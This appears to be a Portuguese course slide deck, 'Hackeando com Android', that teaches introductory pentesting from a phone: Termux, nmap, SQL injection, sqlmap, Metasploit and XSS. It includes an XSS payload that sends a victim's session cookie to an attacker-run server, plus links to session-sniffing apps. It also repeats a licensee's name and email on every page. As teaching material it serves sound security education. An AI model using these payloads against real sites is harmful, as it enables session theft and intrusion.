Você está na página 1de 63

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.

com
AVISO !
Tenha nota que:

1. Este curso foi escrito e apresentado por profissionais de segurança da informação.


2. Toda informação aprendida aqui é com intuito de formar profissionais, e qualquer aplicação fora da
lei é de própria responsabilidade do aplicante da mesma.
3. Todo conteúdo deste curso é de propriedade do Hacking Brasil e Técnicas de Invasão e sua
reprodução não autorizada é vetada.

"Que os nossos esforços desafiem as impossibilidades. Lembrai-vos de que as grandes proezas da história
foram conquistadas do que parecia impossível". - CHARLES CHAPLIN.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


INTRODUÇÃO PENTEST
01 Introdução ao treinamento e 03 Vamos aprender o que é um
sobre o Instrutor. pentest, e seus principais
tipos

ETHICAL HACKING PREPARANDO O LABORATÓRIO


02 Vamos aprender sobre Ethical 04 Aqui faremos nosso
Hacking e suas aplicações laboratório para enfim
legais. começarmos a parte prática.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


COMO ATACAR DO
ATACANDO WEBSITES
MEU CELULAR ? 06 Aqui aprendemos as técnicas
05 Aqui aprenderemos os mais utilizadas para Web
fundamentos principais para Hacking do seu celular.
realizarmos ataques do nosso
dispositivo móvel.

EXPLOIT PERFEITO APLICATIVOS ÚTEIS


07 Nesse módulo, aprendemos a 08 Nesse módulo, deixarei como
descobrir e utilizar o exploit dica, alguns aplicativos que
perfeito utilizo no dia-a-dia

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


INTRODUÇÃO 01
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
Olá, me chamo Pedro Nogueira. Sou Ethical
Hacker e fundador do canal Hacking Brasil
SOBRE O
Serei instrutor de vocês durante todo esse
curso de Hackeando com Android
INSTRUTOR

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


SOBRE O CURSO

O curso Hackeando com Android foi desenvolvido para você que deseja
aprender as principais técnicas hacking e fazendo isso tudo diretamente do
seu celular.

Aqui você vai aprender desde os principais comandos que você pode utilizar
no Termux, até escolher o exploit para um ataque direcionado.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


ETHICAL
HACKING
02
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
O QUE É O ETHICAL HACKING ?

Para entender o que é o Ethical Hacking temos que primeiro entender o que é
um Hacker. Hacker em sua grande maioria é associada aos criminosos, porém,
Hacker, é um indivíduo que tem a habilidade de “quebrar” sistemas em
funcionamento, e um Cyber Criminoso é um Hacker que faz isso pro mal. Ao
contrário disso, O Ethical Hacking, são as práticas de Hacking utilizadas para o
bem, onde o indivíduo é capaz de utilizar as mesmas técnicas que são
utilizadas para denegrir um sistema, faz isso para testá-lo e certificar se está à
prova de invasões. Então, em resumo, o Ethical Hacking, ou Hacker Ético, é
quando um Hacker, do bem, utiliza de meios hackers para testar sistemas mas
de forma ética, sem denegrir o sistema, e somente com a finalidade de testar
a sua segurança.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


NOMENCLATURAS

PENTEST : Penetration Test, testes de invasão em aplicações.

AMEAÇA : Ameaça é quando um sistema tem a possibilidade de estar


vulnerável.

EXPLOIT : Script escrito por você, ou por alguém, que irá explorar de forma
automática no site alvo.

VULNERABILIDADE : É a comprovação que uma ameaça é realmente válida.

MALWARE : Software com parte maliciosa, que tem intuito de comprometer sua
rede.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


COMO SE TORNAR UM HACKER ÉTICO ?

O Hacker Ético é um profissional que segue um código de conduta quando


realiza algum pentest, é aquela pessoa que “Hackeia pra o bem” e não com
intuito de denegrir serviços, sim com o objetivo de tentar achar uma falha, e
reportar, antes que todo um sistema seja comprometido por um CYBER
CRIMINOSO.

Para se tornar um HACKER ÉTICO é importante ter em mente, que um HACKER


ÉTICO, deve seguir algumas condutas, como não divulgação dos dados,
sempre seguir o escopo pré-definido no contrato, e sempre fazer com o
máximo de cuidado para não deixar nada fora do ar.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


TIPOS DE HACKERS

É o hacker do bem, um
É o hacker que não tem
hacker ético, em sua
nenhum tipo de
grande maioria é um É o hacker do bem, white
escrúpulo, que hackeia
WHITE HAT, é aquele que hat, que utiliza algumas
para denegrir um serviço
procura por falhas antes técnicas dos BLACK HAT
e ou, coletar informações
que as CIBERCRIMINOSOS em seu pentest.
e chantagear os donos
possam encontrá-la e
dela.
denegrir algum serviço.,

BLACK HAT WHITE HAT GREY HAT

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


VULNERABILIDADES POR ONDE COMEÇAR

Uma vulnerabilidade é uma falha que conseguimos certificar. Mas agora, como
podemos determinar uma vulnerabilidade ?

Primeiro, podemos começar por sistemas operacionais, sem eles, Windows,


Mac ou Linux. Esse sistemas são sempre testados, e sempre estão lançando
vulnerabilidade comuns (CVE), que podem ser facilmente encontradas em
sistemas desatualizados.

Depois, podemos partir para aplicações, procurando as mesmas CVE’s para as


versões dos sistemas vulneráveis como SQL INJECTION, XSS e ETC.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


ASPECTOS LEGAIS

Como você deve saber, hoje, é proibido por lei invadir, ou testar um sistema
da informação sem autorização de quem é proprietário daquele sistema da
informação, quem faz isso é considerado um Cyber Criminoso, e está passível
à pena de reclusão.

O que sempre como Ethical Hackers devemos fazer é ter tudo documentado,
através de contratos e acordos de NDA. No contrato deve ser especificado em
que o contratante solicitou a exploração de vulnerabilidades naquele escopo,
e que concorda com todos os teste que serão feito. E o acordo de NDA é o
acordo de não divulgação, logo, nenhuma das partes pode vazar informações
sigilosas do projeto de pentest.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


PENTEST 03
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
PENTEST

O pentest ou Penetration Test (traduzindo Teste de Penetração), é onde nós


profissionais de segurança da informação utilizamos de técnicas hackers para
tentar penetrar uma defesa, ou um alvo já previamente definido no escopo.
Pentest é um projeto onde atacamos alguns ativos da empresa, com a
intenção de mostrar falhas de implantação, ou vulnerabilidades para que
possam ser corrigidas.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


TIPOS DE PENTEST
Pentest onde sabemos
todos as informações do
Pentest onde não alvo, se ele conecta em Pentest que é o misto dos
sabemos nenhuma API’s, seus IP’s, servidores dois, nem tanta
informação sobre o alvo, com que conversa, e até informação quanto o
no máximo o seu nome, o login dependendo da White Box, nem pouca
resto vem de pesquisas. plataforma. quanto o Black Box.

BLACK BOX WHITE BOX GREY BOX

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


Analisar e Reconhecer
ativos Reconnaissance
Fase onde escaneamos a
Scanning rede, vulnerabilidades ou
portas abertas.

FASES DE
Depois da análise é
iniciada a tentativa de Gaining Access
invasão pelos analistas.

UM PENTEST Maintaining
Depois de “invadido” o
sistema, o analista deve
trabalhar para manter o
Access seu acesso ao mesmo.

Limpeza de logs, e
resíduos deixados após a
Clearing
exploração. Tracks

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


PREPARANDO O
LABORATÓRIO
04
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
PREPARANDO O LABORATÓRIO

Download do Termux na PlayStore :

https://play.google.com/store/apps/details?id=com.termux&hl=pt_BR&gl=US

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


PREPARANDO O LABORATÓRIO

COMANDOS :

● pkg install net-tools


● pkg install w-get
● pkg install python -y && pkg install python2 -y
● pkg install git
● pip install lolcat
● git clone https://github.com/rajkumardusad/Tool-X.git
● cd Tool-X
● chmod +x install.aex
● sh install.aex
● .\Tool-X
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
PREPARANDO O LABORATÓRIO

PACOTES PARA INSTALAR COM O TOOL-X:

● 268 - NMAP
● 316 - SQLMAP
● 314 - SETOOLKIT

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


PREPARANDO O LABORATÓRIO

INSTALANDO O METASPLOIT :

● git clone https://github.com/noob-hackers/m-wiz.git


● cd m-wiz
● bash m-wiz.sh
● Enter
● Opção 1- Metasploit Install
● Enter
● Opção 1 - Versão 4.4
● Enter

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

● INFORMAÇÕES DO SISTEMAS
○ uname -a
○ uname -m
○ cat /proc/meminfo
○ date
○ whoami
○ id

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

● ADMINISTRAÇÃO DE SISTEMAS
○ shutdown
○ shutdown now
○ shutdown -h 15
○ shutdown -c
○ reboot
○ Logout
○ telinit 0

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

● DISCO
○ df -h
● USUÁRIOS E GRUPOS
○ useradd usuario
○ userdel usuario
○ userdel -r usuario
○ groupadd nomedogrupo
○ groupdel nomedogrupo
○ groupmod -n novonome nomeantigo

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

● USUÁRIOS E GRUPOS
○ passwd usuario
○ gpasswd -a usuario grupo

ARQUIVOS E DIRETÓRIOS

● ls
● cd
● cd ~

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

ARQUIVOS E DIRETÓRIOS

● ls
● cd
● cd ~
● cd ..
● cd ../..
● pwd
● ls -l
● ls -a
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

ARQUIVOS E DIRETÓRIOS

● touch meuarquivo.txt
● cat meuarquivo.txt
● mkdir meudiretorio
● rm
● rm -rf
● mv meuarquivo meuarquivonovo
● mv meuarquivo meunovodiretorio/meuarquivo

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

ARQUIVOS E DIRETÓRIOS

● cp meuarquivo ondequerocopiar/meuarquivo
● find meuarquivo
● gzip meuarquivoparacompactar
● gzip -d meuarquivo.txt.gz
● tar -czf meudiretorioparacompactar
● tar -xvzf meudiretorio.tar

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

TEXTO

● nano meuarquivo.txt
● vim meuarquivo.txt
● vi meuarquivo.txt
● echo “adicionaressalinha” >> meuarquivo.txt
● echo “substituirtodooarquivo” > meuarquivo.txt
● head -4 meuarquivo
● tail -4 meuarquivo
● cat meuarquivo | more
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

TEXTO

● cat meuarquivo | less


● cat meuarquivo | grep o que quero encontrar

REDES

● ifconfig
● ifconfig eth0
● ifdown eth0
● ifup eth0
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

REDES

● ifconfig eth0 10.0.0.1 netmask 255.255.255


● route -n

PROCESSO E CRONTAB

● ps
● ps -aux

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

PROCESSO E CRONTAB

● ps
● ps -aux
● ps -aux | grep root
● crontab -e

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


WHAT DO WE DO?

Mercury is the smallest Venus has a beautiful name,


planet in our Solar System but it’s terribly hot

Jupiter is the biggest planet Saturn is composed of


in our Solar System hydrogen and helium

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


ATACANDO
DO MEU 05
CELULAR
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
COLETA DE INFORMAÇÃO

A coleta de informações é um passo muito importante na parte do Ethical


Hacking, aqui é onde vamos entender com o que estamos lidando, e quais são
as primeiras informações daquele alvo, para num futuro explorar tudo o que
coletamos aqui.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


WHOIS

O Whois é uma ferramenta de DNS muito interessante para coleta de


informações do domínio.
Conseguimos coletar, CPF, Endereço, Servidores de NS, E-mail e ETC.

Então em um pentest de BlackBox, depois de achar o domínio de onde irá


fazer o teste, o Whois pode te trazer mais informações privilegiadas daquele
alvo.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


DNS

O DNS (Domain Name Server) é o serviço responsável por traduzir nome em


endereço ip, coletando informações dos DNS na internet, conseguimos as
informações de seus alvos em grande escala, como por exemplo um site que
estava fora do escopo e apareceu em nossa consulta DNS.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


Google Hacking

O Google Hacking, ou Google Dorks são conjunto de parâmetros à serem


utilizados no Google, como por exemplo o inurl: que todas as pesquisas que
irá trazer, serão da url colocada ali.

No site do Exploit DB podemos ver várias formas de utilizar ao nosso favor.

https://www.exploit-db.com/google-hacking-database

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


Shodan

Shodan é um primo distante do Google Hacking, porém, muito mais poderoso,


ele é voltada para pesquisa de ativos que estão indexados na internet, como
por exemplo, câmeras de segurança, acessos remotos abertos, dentro outros.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


NMAP

Você já sabe que o Network Mapper (NMAP) é um canivete suíço de coleta de


informações, nele nós conseguimos saber desde um dispositivo se está ativo
ou não, temos como consultar portas abertas e até pesquisa de
vulnerabilidade.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


NMAP

COMANDOS ÚTEIS NO NMAP :

HOSTS NA REDE

nmap -sL 192.168.0.1/24

HOSTS ATIVOS

nmap -sn 192.168.0.1/24

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


NMAP

COMANDOS ÚTEIS NO NMAP :

HOSTS COM PORTA 80 ABERTA

nmap -sT -p 80 10.0.0.*

HOSTS COM VULNERABILIDADES

nmap --script vuln 192.168.0.1/24

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


NMAP

COMANDOS ÚTEIS NO NMAP :

VERSÃO DAS APLICAÇÕES

nmap -sV -p 80 10.0.0.0/24

HOSTS EM TXT

nmap -iL /tmp/listahackeandocomandroid.txt

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


NMAP

COMANDOS ÚTEIS NO NMAP :

MODO FAST

nmap -F 192.168.0.1

DESCOBRIR S.O (REQUER ROOT)

nmap -O 192.168.0.1

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


DIRB

O Dirb é uma ferramenta de coleta de informações bastante útil quando


estamos realizando pentest web, pois ele de forma automática realiza a
varredura de diretórios, então é capaz de encontrar páginas
administrativas, páginas com informações demais que conseguem nos
ajudar nos pentest web.

Vale lembrar do parâremtros :

-X .php : vai ter ajudar em um site com extensões .php

-R vai te questionar se quer realizar uma busca recursiva naquele


diretório.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


INFOSPLOIT

O Infosploit é uma ferramenta que irá te ajudar na automatização dos


processos de coleta de informações, fazendo com que seja uma etapa
mais rápida e ágil.

INSTAÇÃO DO INFOSPLOIT :

git clone https://github.com/CybernetiX-S3C/InfoSploit

UTILIZAÇÃO :

cd InfoSploit

Python2 InfoSploit.py
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
ATACANDO
WEBSITES
06
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
SQL INJECTION
Sql injection é a forma com que, os atacantes utilizam as entradas de consulta
em bancos, para ‘modificarem’ e injetar códigos maliciosos na aplicação.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


SQL INJECTION
Em um sistema, para uma consulta melhor, permitimos os usuário insiram
dados para que o filtro, ou inserção de dados no banco seja de acordo com o
que o usuário deseja.
Para fazer isso, usamos o SQL (Structured Query Language) e muitas vezes
esse código está vulnerável à injeção de código.

Partindo do princípio que temos um banco e uma tabela com os usuários,


neste, eu faço uma consulta através do id do usuário.
No meu website, eu tenho um input onde eu insiro este ID e me retorna estes
dados.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


SQL INJECTION

Aqui, podemos deduzir um código em SQL, como por exemplo :


SELECT * FROM usuarios WHERE id = ‘valor do input’

E se, no input eu falasse que, o usuário seria o de ID 1, ou quando 1=1 ( o que


é sempre verdadeiro :P), o código ficaria mais ou menos assim :
SELECT * FROM usuarios WHERE id = ‘1' OR 1='1’
Assim, todo o meu código é verdadeiro, então, vai trazer qualquer coisa que
estiver no banco.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


SQLMAP
Utilização do SQL MAP

$ python sqlmap.py

PARÂMETROS

-u = URL DO SITE
--dbs = MOSTRAR OS BANCOS
--tables = MOSTRAR AS TABELAS
--columns = MOSTRAR AS COLUNAS
-D = SELECIONAR O BANCO
-T = SELECIONAR TABELAS
-C = SELECIONAR COLUNAS
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
XSS
XSS ou Cross-Site-Scripting como é bem conhecido, é uma maneira de
‘inputarmos’ algo malicioso que será interpretado no navegador, seja ele um
redirecionamento, roubo de sessão, ou até mesmo um simples alert.

XSS Reflected :
É o XSS momentâneo, o que depois de f5 some, que não é gravado em
nenhum lugar.

XSS Stored:
É o XSS permanente, que sempre ficará ativo, pois o comando foi guardado no
banco, encontrado muito em páginas de comentários.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


XSS
Comandos utilizados na aula :

Python WebServer
$ python -m http.server

XSS Alert
<script>alert(‘XSS HACKEANDO COM ANDROID’);</script>

XSS Enviando o Cookie da Sessão


<script>fetch('http://192.168.0.145:8000/?='+document.cookie)</script>

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


XSS
Comandos utilizados na aula :

Pegando o Cookie da Sessão


<script>alert(document.cookie);</script>

Rodando FlappyBird
<script>document.body.innerHTML = '<iframe
src="https://ellisonleao.github.io/clumsy-bird/" style="position:fixed; top:0;
left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0;
padding:0; overflow:hidden; z-index:999999;"></iframe>';</script>

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


EXPLOIT
PERFEITO
07
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
EXPLOIT PERFEITO
O exploit perfeito, é aquele que é descoberto com muito suor.
Depois de feita toda a análise, depois do scanning, e com todas as
informações na mão, agora é só pesquisar na internet qual é a
vulnerabilidade e descobrir como aplicá-la.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


MSFCONSOLE
Para executar o MSFCONSOLE

$ cd metasploit-framework
$ ./msfconsole

Parâmetros :
Show options = MOSTRA OPÇÕES
Set = DEFINE ALGUM PARÂMETRO
Rhost = REMOTE HOST (MÁQUINA ALVO)
Lhost = LOCAL HOST (MÁQUINA LOCAL)
Rport = REMOTE PORT (PORTA DA MÁQUINA ALVO)
Lport = LOCAL PORT (PORTA DA MÁQUINA LOCAL)
Exploit ou run = EXECUTA O EXPLOIT
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
MSFCONSOLE
Parâmetros :

Search = PROCURA O EXPLOIT


Use = SELECIONA O EXPLOIT

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


APLICATIVOS
ÚTEIS
08
Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com
APLICATIVOS ÚTEIS
Aplicativos utilizados na aula:

Zanti
https://www.zimperium.com/zanti-mobile-penetration-testing
Facesniff
https://faceniff.ponury.net/
Wikill
https://wifikillapk.com/download/
Fing
https://play.google.com/store/apps/details?id=com.overlook.android.fing&hl=en
Connect Bot
https://play.google.com/store/apps/details?id=org.connectbot&hl=pt_BR&gl=US

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com


THANKS!
Dúvidas ?

contato@hackingbrasil.com

CREDITS: This presentation template was created by Slidesgo, including


icons by Flaticon, and infographics & images by Freepik.

Please keep this slide for attribution.

Licensed to Bruno dos Santos Cardozo - brunocardozocontato@gmail.com

Você também pode gostar